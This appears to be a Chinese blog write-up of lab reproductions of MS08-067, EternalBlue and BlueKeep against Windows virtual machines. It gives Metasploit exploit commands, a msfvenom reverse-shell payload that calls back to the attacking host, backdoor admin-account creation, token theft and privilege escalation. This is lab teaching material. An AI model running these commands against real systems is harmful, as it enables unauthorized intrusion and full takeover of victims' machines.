MSF本地漏洞复现

MS08-067复现

MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003

  • 靶机:Windows XP;IP:192.168.1.20
    在这里插入图片描述

  • 攻击机:Kali系统;IP:192.168.1.7
    在这里插入图片描述

利用条件:

  • 靶机445端口开启
    在这里插入图片描述
  • 靶机防火墙关闭(netsh firewall set opmode mode=disable)

Nmap扫描探测该漏洞是否存在:

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.1.20 --open

在这里插入图片描述

Msfconsole找到漏洞利用模块:

search ms08-067
use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

set rhost 192.168.1.20
show targets
set target 45  
#根据targets信息选择靶机信息

在这里插入图片描述

set payload generic/shell_bind_tcp #设置payload
# 设置本地监听地址和端口
set lhost 192.168.1.7
set lport 1122
options   #最终参数设置如下

在这里插入图片描述

run  # 建立会话,进行命令执行

在这里插入图片描述

ps           #  查看当前靶机进程
migrate 672  #  迁移到pid为672的程序进程上

在这里插入图片描述

run vnc  #  监控靶机桌面

KALI&XP傻傻的分不清楚

在这里插入图片描述

background      #挂起后台
sessions -l     #查看所有会话
sessions -i 1   #调用会话,1是指会话序号

MS017-010

攻击者利用永恒之蓝MS017-010漏洞在目标系统上可以执行任意代码。

复现环境

攻击机:kali-linux :192.168.1.7

在这里插入图片描述

靶机:windows 7 :192.168.1.8
在这里插入图片描述

利用条件:

1.smb 445端口开启
2.防火墙关闭
3.kali与靶机建立连接

漏洞利用:

nmap探测漏洞

nmap --script smb-vuln* 192.168.1.8

在这里插入图片描述

加载msf进行漏洞利用:

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.8
run

利用成功,命令执行:
在这里插入图片描述

添加用户且新增到管理员组

net user test 123456 /add
net localgroup administrator test /add

在这里插入图片描述

远程连接

exit
rdesktop 192.168.1.8

使用刚刚创建的test用户进行登陆
在这里插入图片描述
在这里插入图片描述

提权:

此时我们只是win7的管理员用户,需要进行系统权限的提升:

# 利用msf生成1.exe的payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.7 lport=1122 -f exe >1.exe

在这里插入图片描述

利用admin管理员用户将1.exe放进靶机win 7里面。

# kali设置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

# kali设置本例监听地址和端口,然后开始监听
set lhost 192.168.1.7
set lport 1122
run

在这里插入图片描述

等待win 7 运行1.exe,建立meterpreter连接

尝试会话劫持

getuid
use incognito  # 劫持session
list_tokens -u  # 列出session
# 发现只是管理员权限,没有更高权限会话。无法进行会话劫持
background  # 挂起会话

在这里插入图片描述

利用ms15_051提权:

use exploit/windows/local/ms15_051_client_copy_image  
set session 1   #直接设置我刚刚挂载的会话
run

提权成功:
在这里插入图片描述

CVE-2019-0708复现

ps:复现这个漏洞有点跑题了,使用msf一直失败没有会话产生,所以下面是直接利用EXP复现的。

正文:

该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。影响Windows系统版本包括:

  • windows2003
  • windows2008
  • windows2008 R2
  • windows xp
  • win 7

复现环境:

kali攻击机:192.168.242.142

windows2008 R2靶机:192.168.1.8
在这里插入图片描述

利用条件:

1.靶机防火墙关闭
在这里插入图片描述

2.靶机3389端口开启
在这里插入图片描述

3.攻击机能通信靶机

复现步骤:

1.下载POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git

在这里插入图片描述

2.为脚本文件添加可执行权限

chmod 777 crashpoc.py

在这里插入图片描述

3.如果没有以下安装模块,需要另外安装

pip3 install impacket
pip3 install Structure
pip list  #查看自己安装的所有python模块

4.利用脚本攻击

python crashpoc.py 192.168.1.8 64
#192.168.1.8 是目标IP 64是指系统版本

在这里插入图片描述

ps:不知道为啥脚本会报错,但是攻击成功能够 ok。不太求甚解…

5.攻击成功,合影留念:
在这里插入图片描述

=========================================================

在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你可以通过以下步骤在Kali Linux上复现网络安全漏洞: 1. 安装Kali Linux:首先,从Kali Linux官方网站上下载并安装Kali Linux的最新版本。确保你的系统满足硬件要求,并按照官方指南进行安装。 2. 更新系统:安装完成后,打开终端并使用以下命令更新系统软件包: ``` sudo apt update sudo apt upgrade ``` 3. 选择漏洞和工具:根据你想要复现的具体漏洞,选择合适的工具。例如,如果你想复现Web应用程序的漏洞,可以使用Burp Suite或OWASP ZAP来进行渗透测试。 4. 设置实验环境:在复现漏洞之前,建议你在虚拟环境中设置一个实验环境。你可以使用虚拟机软件(如VirtualBox)创建一个虚拟机,并在其中安装你想要测试的目标应用程序。 5. 扫描目标:使用选定的工具对目标应用程序进行扫描,以寻找可能的漏洞。这些工具通常提供了各种扫描和攻击功能,可以帮助你发现潜在的漏洞。 6. 复现漏洞:一旦你找到了漏洞,你可以使用相应的工具和技术来尝试复现它。这可能涉及到发送特定的请求、利用漏洞或执行其他攻击方法。 7. 记录结果:在复现漏洞的过程中,务必详细记录你的操作和结果。这对于后续的分析和报告非常重要。 请注意,在进行任何网络安全测试之前,确保你已经获得了合法的授权,并遵守适用的法律和道德准则。此外,仅在你拥有合适的技术知识和经验的情况下进行漏洞复现,以避免对目标系统造成不必要的损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值